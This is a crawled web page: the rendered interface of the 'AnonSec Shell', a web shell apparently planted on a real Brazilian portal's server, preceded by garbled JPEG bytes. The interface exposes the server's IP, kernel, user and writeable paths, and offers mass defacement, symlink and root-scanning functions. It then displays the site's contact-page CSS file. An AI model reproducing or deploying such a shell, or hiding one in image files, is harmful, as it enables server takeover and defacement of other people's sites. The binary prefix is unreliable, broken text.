JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/portais/controller_copia/css/controller/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/portais/controller_copia/css/controller/contato.css
@import '../global/modalSucess.css';
@import '../global/modalErro.css';

.contact {
    display: flex;
    justify-content: space-evenly;
    align-items: center;
    height: 100%;
    margin-bottom: 100px;
    position: relative;
}

.contact .contact-form {
   display: flex;
   flex-direction: column;
}

.contact-form h2 {
    margin-top: -2px;
    font-weight: bold;
    font-size: 1.5rem;
}

.contact-form p {
    font-size: 0.95rem;
    font-weight: 400;
    max-width: 60ch;
    color: #717171;
}

.contact-form form {
    margin-top: 20px;
    width: 100%;
}

.group-form {
    margin-bottom: 12px;
}

.group-form :nth-last-child() {
    margin: 0;
}

.group-form label {
    font-size: 0.85rem;
    font-weight: 500;
    color: #051441cc;
    margin-bottom: 4px;
}

.group-form input, textarea {
    width: 100%;
    padding: 10px 14px;
    border-radius: 4px;
    border: solid 0.5px transparent;
    background-color: #F3F3F3;
    outline: none;
    font-size: 0.8rem;
    font-family: inherit;
    color: #8B8B8B;
}

.group-form 
input:focus,
.group-form textarea:focus {
   background-color: transparent;
   border: solid 0.5px #29AAE1;  
   box-shadow: 0px 0px 2px 0px #29aae16b;
}

.group-form textarea {
    resize: none;
    font-size: 0.8rem;
}

::placeholder {
    font-size: 0.8rem;
    font-weight: 400;
    font-family: 'Poppins', sans-serif;
    color: #8B8B8B
}

.contact-form button {
    display: block;
    width: 100%;
    padding: 10px 30px;
    border: none;
    background-color: #178FC1;
    border-radius: 4px;
    font-size: 0.85rem;
    font-weight: 500;
    font-family: inherit;
    color: white;
    transition: all 0.2s ease-in;
    cursor: pointer;
}

.contact-form .btn-form:hover  {
    filter: brightness(0.85);
}

.btn-envio.active {
    display: none !important;
}

.btn-envio[disabled] {
    opacity: .6;
    cursor: default;
}
  
.contact-map {
    height: 100%;
    width: 50%;
    min-height: 100%;
    display: flex;
    justify-content: end;
}

.contact-map iframe {
    filter: grayscale(0.8);
    height: 500px;
    width: 90%;
    border-radius: 4px;
}

/* OUTRAS FORMAS DE CONTATO */
.opcoes-contatos {
    margin-bottom: 140px;
}

.decorador-title {
    display: block;
    text-align: center;
    font-weight: bold;
    font-size: 0.8rem;
    text-transform: uppercase;
}

.opcoes-contatos h3 {
    text-align: center;
    font-size: 1.5rem;
    font-weight: bold;
    margin-top: -4px;
}

.opcoes-contatos .opcoes-subtitulo {
    display: block;
    text-align: center;
    font-size: 0.95rem;
    color: #717171;
}

.container-opcoes {
    margin-top: 40px;
    display: flex;
    justify-content: center;
    align-items: center;
    gap: 40px;
}

.opcoes-item {
    border-radius: 6px;
    border: solid 0.5px #29aae12c;
    padding: 20px;
    width: 380px;
    height: 200px;

    display: flex;
    flex-direction: column;
    justify-content: space-between;

    transition: all 0.2s linear;
    cursor: pointer;
}

.opcoes-item:hover {
    transform: scale(1.05);
}

.opcoes-item-icone i {
    background-color: #29AAE1;
    color: white;
    padding: 8px;
    border-radius: 50%;
}

.opcoes-item-content {
    display: flex;
    flex-direction: column;
    justify-content: center;
}

.item-content-title {
    font-size: 0.9rem;
    font-weight: 500;
}

.item-content-subtitulo {
    font-size: 0.85rem;
    margin-bottom: 6px;
}

.opcoes-item-content a {
    max-width: 80%;
    font-size: 0.85rem;
    text-decoration: none;
    color: #178FC1;
}

.opcoes-item-content a:hover {
    filter: brightness(0.7);
}

@media (max-width: 1000px) {
    .contact {
        flex-direction: column-reverse;
        justify-content: space-evenly;
        gap: 40px;
        align-items: initial;
        margin-bottom: 80px;
    } 

    .contact-map {
        width: 100%;
    }

    .contact-map iframe {
        height: 400px;
        width: 100%;
        border-radius: 4px;
    }

    .opcoes-contatos {
        margin-bottom: 40px
    }

    .container-opcoes {
        gap: 10px;
    }

    .opcoes-item {
        width: 450px;
        height: 200px;
    }
}

@media (max-width: 960px) {
    .container-opcoes {
        gap: 20px;
        flex-direction: column;
    }

    .opcoes-item {
        width: 100%;
        height: 200px;
    }
}

@media (max-width: 500px) {
    .opcoes-contatos h3, .contact-form h3 {
        font-size: 1.3rem;
    }

    .contact-form form {
        margin-top: 30px;
    }

    .group-form label {
        font-size: 0.9rem;
    }

    .group-form input, textarea {
        padding: 15px 14px;
    }

    .contact-form button {
        padding: 15px 30px;
        font-size: 0.95rem;
    }
}


Anon7 - 2022
AnonSec Team